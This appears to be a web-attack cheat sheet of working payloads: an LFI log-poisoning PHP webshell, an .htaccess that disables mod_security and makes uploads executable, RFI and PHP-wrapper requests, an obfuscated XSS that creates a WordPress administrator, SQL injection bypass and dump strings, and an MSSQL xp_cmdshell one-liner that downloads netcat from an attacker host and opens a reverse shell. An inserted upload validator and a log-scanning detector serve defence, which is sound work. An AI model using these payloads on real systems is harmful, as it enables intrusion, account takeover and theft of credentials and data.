Web Attack

Local File Inclusion (LFI)

Log Poisoning

1. Find the log file

curl <Domain Name>?page=../../../../../../../../<Path To Log File>

2. Access the website and forward that request to Repeater in BurpSuite

3. Replace the User-Agent header value with the following

<?php echo system($_GET['cmd']); ?>

4. Send the request

5. Remove the entire User-Agent header from the subsequent request

6. Attack

<Domain Name>?page=../../../../../../../../<Path To Log File>&cmd=<Command>

File Uploads

1. Create a reverse shell

2. Upload the file

3. Access the file

4. If uploading or accessing the file fails, create a .htaccess file with the following content

# Allow access to all file types, including potentially dangerous ones
AddType application/octet-stream .exe .ps1 .bat .sh .php5 .php7 .php .phtml .pl .py
AddHandler application/x-httpd-php .php .php5 .php7 .phtml

# Override any restrictive settings
Options +Indexes +ExecCGI
AllowOverride All
Require all granted

# Disable mod_security and other restrictions (if supported)
<IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
</IfModule>

# Enable uploads with any extension (if used with web apps)
<FilesMatch ".*">
    Order allow,deny
    Allow from all
</FilesMatch>

Upload this file.

NOTE: This only works if the server is Apache and .htaccess overrides are enabled.
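For the defender's side of the upload steps above, here is an added example (not from the original notes) of a server-side upload validator in Python that rejects exactly the tricks listed: dotfiles such as .htaccess, executable extensions anywhere in the name (.php, .php5, .php7, .phtml, .pl, .py, .sh, .exe, .ps1, .bat), client-supplied path components, and content that does not match the declared type. The allowlist of image types, the magic-byte table and the filenames used in the test are assumptions constructed for the example.

```python
import os
import re

# Constructed policy for a hypothetical app: only images are accepted.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Extensions an Apache/PHP host may execute. Taken from the .htaccess trick
# above plus common variants; checked in every position of the name.
EXECUTABLE_EXTENSIONS = {
    "php", "php5", "php7", "phtml", "phar", "pl", "py", "sh",
    "exe", "ps1", "bat", "cgi",
}

# Leading bytes of the allowed image types (constructed lookup table).
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def validate_upload(filename, content):
    """Return (ok, reason); ok is True only when every check passes."""
    # 1. The client must not control the directory the file lands in.
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or name != filename:
        return False, "path components in filename"
    # 2. Dotfiles (.htaccess, .user.ini) are never legitimate uploads.
    if name.startswith("."):
        return False, "dotfile upload rejected"
    # 3. Safe characters only, and at least one extension.
    if not re.fullmatch(r"[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)+", name):
        return False, "filename must be name.ext with safe characters"
    exts = name.lower().split(".")[1:]
    # 4. Every extension component is checked, so shell.php.jpg and
    #    shell.jpg.php both fail here.
    if any(e in EXECUTABLE_EXTENSIONS for e in exts):
        return False, "executable extension"
    if len(exts) != 1 or exts[0] not in ALLOWED_EXTENSIONS:
        return False, "extension not in allowlist"
    # 5. The bytes must match the declared type.
    if not content.startswith(MAGIC[exts[0]]):
        return False, "content does not match extension"
    # 6. Refuse PHP tags even inside an otherwise valid image (polyglot).
    if b"<?php" in content or b"<?=" in content:
        return False, "embedded PHP tag"
    return True, "ok"


if __name__ == "__main__":
    for fname, data in [
        ("photo.png", MAGIC["png"] + b"\x00" * 16),
        (".htaccess", b"AddHandler application/x-httpd-php .png"),
        ("shell.php.jpg", MAGIC["jpg"] + b"<?php echo 1; ?>"),
    ]:
        print(fname, validate_upload(fname, data))
```

Store accepted files under a server-generated name outside the web root; the name check above protects the upload directory, not the rest of the site.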

PHP Wrappers

curl <Domain Name>?page=php://filter/convert.base64-encode/resource=<Path To File>
curl "<Domain Name>?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=<Command in URL encoding>"

Remote File Inclusion (RFI)

curl "<Domain Name>?page=http://<Kali IP Address>/<Reverse Shell File>"

XSS

1. Compress the functions using JScompress

var ajaxRequest = new XMLHttpRequest();
var requestURL = "/wp-admin/user-new.php"; // Replace with the actual endpoint
var nonceRegex = /ser" value="([^"]*?)"/g;
ajaxRequest.open("GET", requestURL, false);
ajaxRequest.send();
var nonceMatch = nonceRegex.exec(ajaxRequest.responseText);
var nonce = nonceMatch[1];
var params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=attacker&email=hacker@test.com&pass1=hacker&pass2=hacker&role=administrator";
ajaxRequest = new XMLHttpRequest();
ajaxRequest.open("POST", requestURL, true);
ajaxRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
ajaxRequest.send(params);
2. Convert the compressed JavaScript to a comma-separated list of UTF-16 character codes

function encode_to_javascript(string) {
    var input = string;
    var output = '';
    // Emit each UTF-16 code unit as a decimal number, comma-separated,
    // which is the form String.fromCharCode() expects.
    for (var pos = 0; pos < input.length; pos++) {
        output += input.charCodeAt(pos);
        if (pos != (input.length - 1)) {
            output += ",";
        }
    }
    return output;
}
let encoded = encode_to_javascript('insert_minified_javascript');
console.log(encoded);
3. Attack

curl -i <Domain Name> --user-agent "<script>eval(String.fromCharCode(<UTF-16 Encoded String>))</script>"

SQL Injection (SQLi)

SQLi Authentication Bypass

<Username>' OR 1=1-- //
'OR '' = '
<Username>'-- //
' union select 1, '<Username Field>', '<Pass Field>' 1-- //
'OR 1=1-- //
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); -- //
1 or 1=1
1' or '1'='1

MySQL

-- Info
SELECT version();
SELECT system_user();

-- DB Enumeration
SHOW DATABASES;
USE <db_name>;
SHOW TABLES;
DESCRIBE users;
SELECT * FROM test.users;

-- Credential Extraction
SELECT user, authentication_string FROM mysql.user WHERE user = 'test';

MSSQL

-- Info
SELECT @@version;
SELECT name FROM sys.databases;
SELECT * FROM offsec.information_schema.tables;
SELECT * FROM testuser.dbo.users;

-- Example users
admin : lab
guest : guest

PostgreSQL

SELECT version();
SELECT current_user;
SELECT current_database();
SELECT datname FROM pg_database;
SELECT tablename FROM pg_tables WHERE schemaname='public';
SELECT column_name FROM information_schema.columns WHERE table_name='users';

MongoDB (NoSQL Injection)

-- REST param bypass
username=admin'&password[$ne]=1

-- JSON-style
{ "username": {"$ne": null}, "password": {"$ne": null} }
{ "$where": "this.password.length < 100" }

Error-Based SQLi

tom' OR 1=1 -- //
' or 1=1 in (select @@version) -- //
' OR 1=1 in (SELECT * FROM users) -- //
' or 1=1 in (SELECT password FROM users) -- //
' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //

Union-Based SQLi

-- 1) Find number of columns
' ORDER BY 1-- //

-- 2) Basic Union Extraction
%' UNION SELECT database(), user(), @@version, null, null -- //
' UNION SELECT null, null, database(), user(), @@version  -- //

-- 3) Enumerate DB objects
' UNION SELECT null, table_name, column_name, table_schema, null FROM information_schema.columns WHERE table_schema=database() -- //

-- 4) Dump User Info
' UNION SELECT null, username, password, description, null FROM users -- //

Manual Code Execution in MSSQL

-- Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Run Command
EXEC xp_cmdshell '<command>';

-- Examples
'; EXEC xp_cmdshell 'whoami'; -- //
'; EXEC xp_cmdshell 'dir C:\Users'; -- //
'; EXEC xp_cmdshell 'ping 192.168.45.165'; -- //

Encoded Examples

%27%3B%20EXEC%20sp_configure%20%22show%20advanced%20options%22%2C%201%3B%20--%20%2F%2F
%27%3B%20EXEC%20xp_cmdshell%20%22whoami%22%3B%20--%20%2F%2F

One-Liner Reverse Shell (MSSQL)

'; EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "curl http://<Kali IP Address>/nc64.exe -o C:\\Users\\Public\\nc64.exe"; EXEC xp_cmdshell "C:\\Users\\Public\\nc64.exe <Kali IP Address> <Kali Port> -e cmd.exe"; -- //
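As an added detection example (not from the original notes and not any product's rule set), the Python script below runs a small set of regular expressions over constructed Apache combined-format access log lines that reproduce the request shapes from the LFI, log poisoning, PHP wrapper, RFI, XSS and encoded MSSQL sections above. It URL-decodes the request target, expands String.fromCharCode(...) sequences in the User-Agent so an obfuscated payload is readable in the finding, and tags each line with the indicators it matched. The log lines, the IP addresses (documentation ranges) and the rule names are assumptions constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines (Apache combined log format). The request shapes
# mirror the sections above; hosts and IPs are documentation addresses.
SAMPLE_LOG = r'''
192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
192.0.2.11 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 88213 "-" "<?php echo system($_GET['cmd']); ?>"
192.0.2.11 - - [10/Oct/2023:13:55:52 +0000] "GET /index.php?page=../../../../../../../../var/log/apache2/access.log&cmd=id HTTP/1.1" 200 88301 "-" "-"
192.0.2.12 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 2210 "-" "curl/8.0"
192.0.2.13 - - [10/Oct/2023:13:56:09 +0000] "GET /index.php?page=http://198.51.100.7/shell.txt HTTP/1.1" 200 510 "-" "curl/8.0"
192.0.2.14 - - [10/Oct/2023:13:56:15 +0000] "GET / HTTP/1.1" 200 1043 "-" "<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>"
192.0.2.15 - - [10/Oct/2023:13:56:22 +0000] "GET /login.php?user=%27%3B%20EXEC%20xp_cmdshell%20%22whoami%22%3B%20--%20%2F%2F HTTP/1.1" 500 302 "-" "Mozilla/5.0"
'''

# Combined log format: ip ident user [time] "method target proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

# Rule names are constructed for this example. Each regex is applied to the
# URL-decoded request target and the raw User-Agent together.
RULES = [
    ("path_traversal", re.compile(r"(\.\./|\.\.\\){2,}")),
    ("php_wrapper", re.compile(r"(php|data)://", re.I)),
    ("remote_include", re.compile(r"=(https?|ftp)://", re.I)),
    ("php_tag", re.compile(r"<\?(php|=)", re.I)),
    ("script_tag", re.compile(r"<script|String\.fromCharCode|javascript:", re.I)),
    ("sql_keywords", re.compile(
        r"union\s+select|xp_cmdshell|sp_configure|'\s*or\s+1\s*=\s*1|--\s*//", re.I)),
]


def decode_charcodes(text):
    """Replace String.fromCharCode(97,108,...) with the characters it builds."""
    def repl(m):
        codes = [int(c) for c in re.findall(r"\d+", m.group(1))]
        return "".join(chr(c) for c in codes)
    return re.sub(r"String\.fromCharCode\(([\d,\s]*)\)", repl, text)


def analyze_line(line):
    """Return a finding dict for a suspicious line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode %27%3B... so encoded payloads are matched in their real form.
    target = unquote_plus(m.group("target"))
    ua = m.group("ua")
    haystack = target + "\n" + ua
    tags = [name for name, rx in RULES if rx.search(haystack)]
    if not tags:
        return None
    return {"ip": m.group("ip"), "target": target, "tags": tags,
            "user_agent": decode_charcodes(ua)}


def scan(log_text):
    """Run analyze_line over every line and collect the findings in order."""
    return [f for f in (analyze_line(l) for l in log_text.strip().splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["ip"], finding["tags"], finding["target"], finding["user_agent"])
```

Two points for anyone wiring this into monitoring: Apache writes `\"` for a double quote inside a logged header, so a production parser should unescape the User-Agent before matching, and the decoded User-Agent in the finding is what makes the poisoned log entry and the fromCharCode XSS readable to the person triaging the alert.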
